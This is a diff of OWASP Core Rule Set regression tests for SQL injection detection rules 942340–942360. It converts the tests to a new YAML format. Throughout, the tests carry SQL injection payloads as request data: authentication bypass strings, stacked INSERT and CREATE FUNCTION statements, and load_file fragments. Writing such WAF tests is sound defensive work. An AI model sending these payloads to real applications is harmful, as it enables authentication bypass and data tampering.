942340.yaml +rule_id: 942340 tests: - - test_title: 942340-1 + - test_id: 1 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # in ( select * from - uri: "/get?var=in%20%28%20select%20%2a%20from" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # in ( select * from + uri: "/get?var=in%20%28%20select%20%2a%20from" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 2 desc: "SQLite authentication bypass with except select" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except \tselect.1,2 - uri: "/get?var=except%20%09select.1%2C2" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except \tselect.1,2 + uri: "/get?var=except%20%09select.1%2C2" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 3 desc: "SQLite authentication bypass with except values" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except values (1,2) - uri: "/get?var=except%20values(1%2C2)" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except values (1,2) + uri: "/get?var=except%20values(1%2C2)" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 4 desc: "true-negative except selecting" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except selecting - uri: "/get?var=except%20selecting" - version: HTTP/1.0 - output: - no_log_contains: id "942340" - - test_title: 942340-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except selecting + uri: "/get?var=except%20selecting" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942340] + - test_id: 5 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20array[id]%20is%20not%20null--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20array[id]%20is%20not%20null--" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 6 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20email~all(array[email]);analyze--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20email~all(array[email]);analyze--" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 7 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20and%20email%20not%20similar%20to%20id--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20and%20email%20not%20similar%20to%20id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 8 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20or%20true;%20foo" - version: HTTP/1.0 - output: - log_contains: id "942340" - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20or%20false;%20foo" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20or%20true;%20foo" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20or%20false;%20foo" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 9 desc: "basic SQL authentication bypass attempts 3/3 (no whitespace between operator)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='||true" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='||true" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 10 desc: "SQL Auth Bypass FP test (invalid operator without whitespace)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='ortrue" - version: HTTP/1.0 - output: - no_log_contains: id "942340" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='ortrue" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942340] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml index 23246f00b..7934f55fc 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml @@ -1,74 +1,72 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None - enabled: true - name: 942350.yaml +rule_id: 942350 tests: - - test_title: 942350-1 + - test_id: 1 desc: "MySQL UDF injection and other data/structure manipulation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # ; insert INTO table (word) VALUES('dfsd') - uri: "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" - version: HTTP/1.0 - output: - log_contains: id "942350" - - test_title: 942350-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ; insert INTO table (word) VALUES('dfsd') + uri: "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" + version: HTTP/1.0 + output: + log: + expect_ids: [942350] + - test_id: 2 desc: "Fix for FP reported in GitHub issue 1587" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # ;insertion_424242 - uri: "/get?var=%3Binsertion_424242" - version: HTTP/1.0 - output: - no_log_contains: id "942350" - - test_title: 942350-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ;insertion_424242 + uri: "/get?var=%3Binsertion_424242" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942350] + - test_id: 3 desc: "MySQL create function injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); - uri: "/get?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" - version: HTTP/1.0 - output: - log_contains: id "942350" - - test_title: 942350-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); + uri: "/get?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" + version: HTTP/1.0 + output: + log: + expect_ids: [942350] + - test_id: 4 desc: "Status Page Test - MySQL injection with ;truncate[xx" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=;truncate[xx" - version: HTTP/1.0 - output: - log_contains: id "942350" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=;truncate[xx" + version: HTTP/1.0 + output: + log: + expect_ids: [942350] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml index 860b3b966..3631ba1b1 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml @@ -1,671 +1,669 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" - description: None - enabled: true - name: 942360.yaml +rule_id: 942360 tests: - - test_title: 942360-1 + - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # 23423 as "sdfsdfs" FROM table - data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select Char(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select Char(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 3 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT GROUP_CONCAT(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT group_cOnCat(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `edit_user_id` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 8 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%60+REGEXP%20" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `OXTIMESTAMP` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "(load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "(load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `documentType` FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 13 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "6 As\" from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "6 As\" from" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 14 desc: GH issue 1580 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ", aside from" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ", aside from" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 15 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/create" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/create" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 16 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/CREATE TABLE Persons" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 17 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " Delete (Trashcan)" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: " Delete (Trashcan)" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 18 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "5desc" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-19 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "5desc" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 19 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "34-delete" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-20 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "34-delete" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 20 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " update" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-21 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: " update" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 21 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 